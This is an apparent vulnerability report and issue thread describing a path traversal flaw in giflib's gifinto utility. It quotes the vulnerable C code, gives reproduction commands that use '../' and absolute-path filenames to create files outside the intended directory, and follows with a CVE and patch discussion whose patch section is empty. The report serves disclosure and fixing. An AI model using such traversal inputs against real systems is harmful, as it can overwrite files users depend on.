# Summary
Path Traversal vulnerability in giflib's `gifinto` utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.
# Report Description
Path Traversal vulnerability in giflib’s `gifinto` utility allows attackers to create or overwrite files in arbitrary directories due to insufficient validation of user-supplied filenames.
# Vulnerability Description
File: `gifinto.c`
The utility accepts a filename via command-line arguments (parsed by `GAGetArgs()`), extracts its directory portion, and uses it to create a temporary file (`TempInto.XXXXXX`).
If the input file exceeds `MinFileSize` (14 bytes), the temporary file is renamed to the original filename.
However, no validation is performed to prevent the use of `../` (relative path traversal) or absolute paths.
This allows an attacker to supply a crafted filename and cause file creation in unintended locations.
## Vulnerable Code Snippet
```c
/* Isolate the directory where our destination is, and set tmp file name */
/* in the very same directory. This code is insecure because it creates */
/* predictable names, but it's not worth the effort and risk to fix. */
if (*FileName == NULL) {
GIF_EXIT("No valid Filename given.");
}
if (strlen(*FileName) > STRLEN - 1) {
GIF_EXIT("Filename too long.");
}
memset(FullPath, '\0', sizeof(FullPath));
strncpy(FullPath, *FileName, STRLEN);
if ((p = strrchr(FullPath, '/')) != NULL ||
(p = strrchr(FullPath, '\\')) != NULL) {
p[1] = 0;
} else if ((p = strrchr(FullPath, ':')) != NULL) {
p[1] = 0;
} else {
FullPath[0] = 0; /* No directory or disk specified. */
}
if (strlen(FullPath) > STRLEN - 1) {
GIF_EXIT("Filename too long.");
}
strncpy(FoutTmpName, FullPath, STRLEN); /* First setup the Path */
/* then add a name for the tempfile */
if ((strlen(FoutTmpName) + strlen(DEFAULT_TMP_NAME)) > STRLEN - 1) {
GIF_EXIT("Filename too long.");
}
strcat(FoutTmpName, DEFAULT_TMP_NAME);
#ifdef _WIN32
char *tmpFN = _mktemp(FoutTmpName);
#endif
gcc -o gifinto gifinto.c getarg.c -I.
echo -n "GIF89a1234567890" > test-sandeep.gif
cat test-sandeep.gif | ./gifinto output-sandeep.gif
Expected:
output-sandeep.gif is created in the current directory.
cat test-sandeep.gif | ./gifinto ../traversal-sandeep.gif
cat test-sandeep.gif | ./gifinto /tmp/absolute-sandeep.gif
Observed:
Files are created outside the intended directory (e.g., in the parent directory or /tmp), confirming the vulnerability.
ls -l output-sandeep.gif ../traversal-sandeep.gif /tmp/absolute-sandeep.gif
This vulnerability can be exploited by any user or attacker with access to execute the vulnerable gifinto utility.
By supplying a malicious filename containing relative or absolute paths, an attacker can create or overwrite arbitrary files on the file system.
Exploiting this flaw may lead to:
@thecybersandeep are you aware of any CVE assigned to or requested for this?
H @hartwork ,
I have already requested a CVE for this vulnerability.
Once the CVE ID is assigned, I will update you and add it here.
@thecybersandeep perfect, thank you!
@thecybersandeep maybe I overlooked something — did you create a patch? Are you aware of a patch for this by anyone else?
@thecybersandeep greetings, any updates on the topics of CVE number and/or availability of a patch? Thanks!
@hartwork Thanks for asking!
CVE Number Update:
I’ve already submitted a request for a CVE ID for this issue. Got a confirmation email with a request ID, so it’s in process with the CVE Assignment Team.
Patch Details:
Patch Details:
I’m hoping this will help secure gifinto properly!
I’ll keep you posted on the CVE updates. If you have more questions, just ping me!
Best,
Sandeep
Diff:
Fix pushed.